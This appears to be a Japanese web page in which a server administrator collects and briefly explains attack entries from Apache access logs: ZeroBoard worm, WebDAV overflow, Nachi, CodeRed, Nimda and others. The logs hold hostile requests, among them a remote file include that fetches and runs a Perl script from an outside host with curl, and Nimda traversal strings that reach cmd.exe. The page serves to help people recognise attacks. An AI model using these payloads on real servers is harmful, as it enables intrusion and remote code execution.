| access_logファイルの一部(nn.nnn.nnn.nnnとありますのは攻撃をしかけてきたIPアドレスです。必ずしも同一ではありません。) |
| ZeroBoard wormと呼ぶようですが詳細不明です。 |
| nn.nnn.nnn.nnn - - [02/Dec/2005:08:09:30 +0900] "GET //bbs/skin/zero_vote/error.php?dir=http://nn.nnn.nnn.nnn/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20nn.nnn.nnn.nnn/mmm;perl%20mmm HTTP/1.1" 404 313 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows 98)" |
|
WebDAV の脆弱性を狙った HTTP server への攻撃
これはWindowsのIIS5.0の惰弱性をついた攻撃でパッチを当てていれば問題ないらしいです。
この攻撃の記録は1つが30~40kbyteありlogファイルはすぐにMbyteになります。 |
nn.nnn.nnn.nnn - - [25/Apr/2004:09:59:29 +0500] "SEARCH /\x90\x02\xb1\x02\xb1\x
02\xb1\x02\---途中省略--\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90" 414 337 "-" "-" |
|
| 「WORM_NACHI.A」というワームによるアクセスだそうです。IISをターゲットとしているので、IISを利用しているサーバは注意が必要です。 |
| nn.nnn.nnn.nnn - - [18/Apr/2004:13:26:37 +0500] "GET / HTTP/1.1" 200 6885 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" |
|
アクセスされたApacheを経由して、スパムメールの送信を試みている、ということのようです
405=Method Not
Allowed(リクエストされたURIに対して、指定されたメソッドは許可されていません) |
| nn.nnn.nnn.nnn - - [20/Apr/2004:11:00:33 +0500] "CONNECT 1.3.3.7:1337 HTTP/1.0" 405 297 "-" "-" |
|
| WINNTAutoAttack V2.5というアタックツールからの攻撃 |
nnn.nnn.nnn.nn - - [12/Oct/2004:19:39:07 +0900] "GET /NULL.IDACCCCCCCC----途中省略------
P\x13\x93cmd.exe$ HTTP/1.1" 400 377
"-" "-" |
|
| 「CodeRed」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ |
nn.nnn.nnn.nnn - - [20/Apr/2004:12:26:52 +0500] "GET /default.ida?XXXXXXXXXXXXX
--途中省略--8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 271
"-" "-" |
|
| Microsoft Windows MediaサービスのNSIISlog.DLLにリモート・バッファ・オーバーフローの脆弱性 |
| nn.nnn.nnn.nnn - - [22/Apr/2004:16:59:00 +0500] "GET /scripts/nsiislog.dll" 404 - "-" "-" |
|
| NIMDA - IISアタックログのワンサイクル |
nn.nnn.nnn.nnn - - [24/Apr/2004:12:33:10 +0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
nn.nnn.nnn.nnn - - [24/Apr/2004:12:33:11 +0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274 "-" "-"
nn.nnn.nnn.nnn - - [24/Apr/2004:12:33:11 +0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
nn.nnn.nnn.nnn - - [24/Apr/2004:12:33:12 +0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
nn.nnn.nnn.nnn - - [24/Apr/2004:12:33:12 +0500] "GET /scripts/..%255c../main/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
nn.nnn.nnn.nnn - - [24/Apr/2004:12:33:13 +0500] "GET /_vti_bin/..%255c../main/..%255c../main/..%255c../main/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-" <-Nimda->
nn.nnn.nnn.nnn - - [24/Apr/2004:12:33:13 +0500] "GET /_mem_bin/..%255c../main/..%255c../main/..%255c../main/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 315 "-" "-"
nn.nnn.nnn.nnn - - [24/Apr/2004:12:33:14 +0500] "GET /msadc/..%255c../main/..%255c../main/..%255c/..%c1%1c../main/..%c1%1c../main/..%c1%1c../main/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 331 "-" "-"
nn.nnn.nnn.nnn - - [24/Apr/2004:12:33:14 +0500] "GET /scripts/..%c1%1c../main/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
nn.nnn.nnn.nnn - - [24/Apr/2004:12:33:15 +0500] "GET /scripts/..%c0%2f../main/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
nn.nnn.nnn.nnn - - [24/Apr/2004:12:33:15 +0500] "GET /scripts/..%c0%af../main/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
nn.nnn.nnn.nnn - - [24/Apr/2004:12:33:16 +0500] "GET /scripts/..%c1%9c../main/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
nn.nnn.nnn.nnn - - [24/Apr/2004:12:33:19 +0500] "GET /scripts/..%%35%63../main/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-" "-"
nn.nnn.nnn.nnn - - [24/Apr/2004:12:33:20 +0500] "GET /scripts/..%%35c../main/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-" "-"
nn.nnn.nnn.nnn - - [24/Apr/2004:12:33:20 +0500] "GET /scripts/..%25%35%63../main/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
nn.nnn.nnn.nnn - - [24/Apr/2004:12:33:21 +0500] "GET /scripts/..%252f../main/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-" |
|
